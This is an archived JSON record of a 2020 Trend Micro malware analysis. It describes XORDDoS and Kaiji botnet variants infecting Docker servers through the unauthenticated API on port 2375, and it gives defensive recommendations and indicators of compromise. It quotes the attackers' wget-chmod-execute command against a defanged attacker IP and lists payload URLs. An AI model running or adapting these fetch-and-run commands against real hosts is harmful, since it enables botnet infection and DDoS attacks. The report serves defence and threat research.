{
	"id": "2b22290b-e75b-43ec-a002-ebce3e6c6df8",
	"created_at": "2026-04-06T00:08:27.125915Z",
	"updated_at": "2026-04-10T03:21:45.634001Z",
	"deleted_at": null,
	"sha1_hash": "ddd058fcd38b9bfd468a8bbe98ab083641cc6953",
	"title": "XORDDoS, Kaiji Variants Target Exposed Docker Servers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 307203,
	"plain_text": "XORDDoS, Kaiji Variants Target Exposed Docker Servers\r\nBy Augusto Remillano II, Patrick Noel Collado, Karen Ivy Titiwa ( words)\r\nPublished: 2020-06-22 · Archived: 2026-04-05 22:21:12 UTC\r\nWe have recently detected variants of two existing Linux botnet malware types targeting exposed Docker servers;\r\nthese are XORDDoS malware (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) and Kaiji DDoS\r\nmalware (detected by Trend Micro as DDoS.Linux.KAIJI.A).\r\nHaving Docker servers as their target is a new development for both XORDDoS and Kaiji; XORDDoS was known\r\nfor targeting Linux hosts on cloud systems, while recently discovered Kaiji was first reportedopen on a new tab to\r\naffect internet of things (IoT) devices. Attackers usually used botnets to perform brute-force attacks after scanning\r\nfor open Secure Shell (SSH) and Telnet ports. Now, they also searched for Docker servers with exposed ports\r\n(2375). Port 2375, one of the two ports Docker API uses, is for unencrypted and unauthenticated\r\ncommunicationopen on a new tab.\r\nThere is, however, a notable difference between the two malware variants’ method of attack. While the XORDDoS\r\nattack infiltrated the Docker server to infect all the containers hosted on it, the Kaiji attack deploys its own container\r\nthat will house its DDoS malware.\r\nThese malware variants facilitate distributed denial of service (DDoS), a type of attack designed to disable, disrupt,\r\nor shut down a network, website, or service. This is done by using multiple systems to overwhelm the target system\r\nwith traffic until it becomes inaccessible to other users.\r\nAnalysis of XORDDoS malware\r\nThe XORDDoS infection started with the attackers searching for hosts with exposed Docker API ports (2375). They\r\nthen sent a command that listed the containers hosted on the Docker server. Afterwards, the attackers executed the\r\nfollowing sequence of commands to all containers, infecting all of them with the XORDDoS malware:\r\nwget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP\r\nchmod 777 VIP\r\n./VIP\r\nThe XORDDoS payload (detected by Trend Micro as Backdoor.Linux.XORDDOS.AE) still used the XOR-key it\r\nused in other recorded attacks, BB2FA36AAA9541F0, to encrypt its strings and to communicate with the command\r\nand control (C\u0026C) server. It also created multiple copies of itself inside the machine as a persistence mechanism.\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nPage 1 of 5\n\nFigure 1. Code snippet showing XORDDoS creating multiple copies of itself\r\nThe payload initiated SYN, ACK, and DNS types of DDoS attacks.\r\nFigure 2. Code snippet showing the types of DDoS attack that XORDDoS can launch\r\nIt is also capable of downloading and executing a follow-up malware, or updating itself.\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nPage 2 of 5\n\nFigure 3. Code snippet showing XORDDoS’ capability to download and update files.\r\nIt gathered the following data, which are relevant to its attempt to initiate a DDoS attack:\r\nCPU Information\r\nMD5 of Running Process\r\nMemory Information\r\nNetwork Speed\r\nPID of Running Process\r\nIt should be noted that most of the behaviors exhibited by this particular XORDDoS variant have already been\r\nobserved in earlier variants of the malware.\r\nUpon further investigation of the URL linked to the attacker, we found other malware such as\r\nBackdoor.Linux.DOFLOO.AB, a variant of Dofloo/AESDDoS Linux botnet malware that we witnessed  targeting\r\nexposed Docker APIs previously.\r\nAnalysis of Kaiji malware\r\nSimilar with the XORDDoS malware, Kaiji is now also targeting exposed Docker servers for propagation. Its\r\noperator also scanned the internet for hosts with exposed port 2375. After finding a target, they pinged the Docker\r\nserver before deploying a rogue ARM container that executed the Kaiji binary.\r\nThe script 123.sh (detected by Trend Micro as Trojan.SH.KAIJI.A) downloaded and executed the malware payload,\r\nlinux_arm (detected by Trend Micro as DDoS.Linux.KAIJI.A). Afterwards, the script also removed other Linux\r\nbinaries that are basic components of the operating system but are not necessary for its DDoS operation.\r\nFigure 4. Query that downloads and executes 123.sh\r\nFigure 5. Code snippet showing the removal of Linux binaries\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nPage 3 of 5\n\nThe payload linux_arm, which is the Kaiji DDoS malware, initiated the following DDoS attacks:\r\nACK attack\r\nIPS spoof attack\r\nSSH attack\r\nSYN attack\r\nSYNACK attack\r\nTCP flood attack\r\nUDP flood attack\r\nThis malware also gathered the following data, which it can use for the aforementioned attacks:\r\nCPU Information\r\nDirectories\r\nDomain Name\r\nHost IP address\r\nPID of Running Process\r\nURL scheme\r\nDefending Docker servers\r\nAs seen in these findings, threat actors behind malware variants constantly upgrade their creations with new\r\ncapabilities so that they can deploy their attacks against other entry points. As they are relatively convenient to\r\ndeploy in the cloud, Docker servers are becoming an increasingly popular option for companies. However, these also\r\nmake them an attractive target for cybercriminals who are on the constant lookout for systems that they can exploit.\r\nThese are some recommendations for securing Docker serversnews article:\r\nSecure the container host. Take advantage of monitoring tools, and host containers in a container-focused OS.\r\nSecure the networking environment. Use intrusion prevention system (IPS) and web filtering to provide\r\nvisibility and observe internal and external traffic.\r\nSecure the management stack. Monitor and secure the container registry and lock down the Kubernetes\r\ninstallation.\r\nSecure the build pipeline. Implement a thorough and consistent access control scheme and install strong\r\nendpoint controls.\r\nAdhere to the recommended best practicesopen on a new tab.\r\nUse security tools to scan and secure containers.\r\nSecurity solutions are recommended for safeguarding Docker servers. Trend Micro™ Hybrid Cloud\r\nSecurityproducts is recommended for automated security and protection for physical, virtual, and cloud workloads.\r\nThis solution encompasses the following:\r\nTrend Micro Cloud One™products– for comprehensive visibility and protection against threats\r\nTrend Micro Cloud One - Container Securityproducts– for automated container image and registry scanning\r\nthat helps detect threats early on\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nPage 4 of 5\n\nTrend Micro Cloud One – Workload Securityproducts – for protecting new and existing workloads against\r\neven unknown threats using techniques such as machine learning and virtual patching\r\nFor security as software: Trend Micro Deep Security™ Softwareproducts (workload and container security)\r\nand Trend Micro Deep Security Smart Check (container image security)products for scanning container\r\nimages and preventing further compromise\r\nIndicators of Compromise\r\nKaiji\r\nFile\r\nname\r\nSHA 256\r\nTrend Micro pattern\r\ndetection\r\n123.sh 9301d983e9d8fad3cc205ad67746cd111024daeb4f597a77934c7cfc1328c3d8 Trojan.SH.KAIJI.A\r\nlinux_arm d315b83e772dfddbd2783f016c38f021225745eb43c06bbdfd92364f68fa4c56 DDoS.Linux.KAIJI.A\r\nRelated URLs:\r\nhxxp://62[.]171[.]160[.]189/linux_arm\r\nhxxp://62[.]171[.]160[.]189/11/123.sh\r\nXORDDoS and other malware variants found through the same URL\r\nRelated URL:\r\nhxxp://122[.]51[.]133[.]49:10086/VIP\r\nSource: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nhttps://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html"
	],
	"report_names": [
		"xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434107,
	"ts_updated_at": 1775791305,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ddd058fcd38b9bfd468a8bbe98ab083641cc6953.pdf",
		"text": "https://archive.orkl.eu/ddd058fcd38b9bfd468a8bbe98ab083641cc6953.txt",
		"img": "https://archive.orkl.eu/ddd058fcd38b9bfd468a8bbe98ab083641cc6953.jpg"
	}
}